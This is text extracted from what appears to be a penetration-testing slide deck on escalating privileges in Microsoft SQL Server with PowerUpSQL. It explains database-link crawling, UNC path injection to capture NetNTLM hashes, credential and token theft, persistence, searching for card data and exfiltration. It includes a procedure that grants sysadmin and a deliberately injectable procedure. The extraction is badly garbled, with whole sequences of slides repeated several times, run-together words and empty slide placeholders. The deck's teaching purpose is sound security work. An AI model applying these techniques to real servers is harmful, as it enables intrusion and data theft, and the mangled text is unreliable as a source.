Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
